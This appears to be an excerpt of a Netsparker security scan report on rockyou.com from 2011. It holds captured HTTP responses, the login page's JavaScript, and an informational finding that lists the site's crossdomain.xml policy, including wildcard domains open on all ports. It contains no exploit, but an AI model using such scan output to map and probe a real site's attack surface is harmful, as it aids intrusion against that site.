value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Date: Mon, 18 Apr 2011 21:53:55 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:55 GMT; path=/; domain=.rockyou.com,lastlogin=1303163635; expires=Wed, 27-Jul-2011 21:53:55 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11297 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Crossdomain.xml Identified
Crossdomain.xml Identified
1
TOTAL
INFORMATION
Netsparker identified a Crossdomain.xml file on the target web site. This issue is reported as extra information.
Impact
This issue is reported as extra information, there is no direct impact resulting from this issue.
|
- /crossdomain.xml
/crossdomain.xml |
Policy Rules
- *.rockmyspace.com
- *.rockyou.com
- rockmyspace.com
- rockyou.com
- *.meebo.com
- *.rockyou-internal.com
- *.ministryofwar.com
- api.msappspace.com
- *.yahoo.net
- *.yimg.com
- x.mochiads.com
- www.mochiads.com
- www.mochimedia.com
- *.rockyoucdn1.com
- *.rockyoucdn2.com
- *.rockyoucdn3.com
- *.rockyoucdn4.com
Request
GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: lang=en; lastlogin=1303163633; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: lang=en; lastlogin=1303163633; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:53:53 GMT
Server: Apache/2.2
Last-Modified: Wed, 06 Apr 2011 23:33:18 GMT
ETag: "4ff-4a0486ae00b80"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=218 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 276
Connection: close
Content-Type: text/xml
<cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*.rockmyspace.com" to-ports="*" /> <allow-access-from domain="*.rockyou.com" to-ports="*" /> <allow-access-from domain="rockmyspace.com" to-ports="*" /> <allow-access-from domain="rockyou.com" to-ports="*" /> <allow-access-from domain="*.meebo.com" to-ports="*" /> <allow-access-from domain="*.rockyou-internal.com" to-ports="*" /><allow-access-from domain="*.ministryofwar.com" to-ports="*"/><allow-access-from domain="api.msappspace.com" to-ports="*" /> <allow-access-from domain="*.yahoo.net" to-ports="80" /> <allow-access-from domain="*.yimg.com" to-ports="80" /> <allow-access-from domain="x.mochiads.com" to-ports="80" /> <allow-access-from domain="www.mochiads.com" to-ports="80" /> <allow-access-from domain="www.mochimedia.com" to-ports="80" /> <allow-http-request-headers-from domain="*.rockyou.com" headers="*" secure="true" /> <allow-access-from domain="*.rockyoucdn1.com" to-ports="*" /> <allow-access-from domain="*.rockyoucdn2.com" to-ports="*" /> <allow-access-from domain="*.rockyoucdn3.com" to-ports="*" /> <allow-access-from domain="*.rockyoucdn4.com" to-ports="*" /></cross-domain-policy>
Date: Mon, 18 Apr 2011 21:53:53 GMT
Server: Apache/2.2
Last-Modified: Wed, 06 Apr 2011 23:33:18 GMT
ETag: "4ff-4a0486ae00b80"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=218 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 276
Connection: close
Content-Type: text/xml
<cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*.rockmyspace.com" to-ports="*" /> <allow-access-from domain="*.rockyou.com" to-ports="*" /> <allow-access-from domain="rockmyspace.com" to-ports="*" /> <allow-access-from domain="rockyou.com" to-ports="*" /> <allow-access-from domain="*.meebo.com" to-ports="*" /> <allow-access-from domain="*.rockyou-internal.com" to-ports="*" /><allow-access-from domain="*.ministryofwar.com" to-ports="*"/><allow-access-from domain="api.msappspace.com" to-ports="*" /> <allow-access-from domain="*.yahoo.net" to-ports="80" /> <allow-access-from domain="*.yimg.com" to-ports="80" /> <allow-access-from domain="x.mochiads.com" to-ports="80" /> <allow-access-from domain="www.mochiads.com" to-ports="80" /> <allow-access-from domain="www.mochimedia.com" to-ports="80" /> <allow-http-request-headers-from domain="*.rockyou.com" headers="*" secure="true" /> <allow-access-from domain="*.rockyoucdn1.com" to-ports="*" /> <allow-access-from domain="*.rockyoucdn2.com" to-ports="*" /> <allow-access-from domain="*.rockyoucdn3.com" to-ports="*" /> <allow-access-from domain="*.rockyoucdn4.com" to-ports="*" /></cross-domain-policy>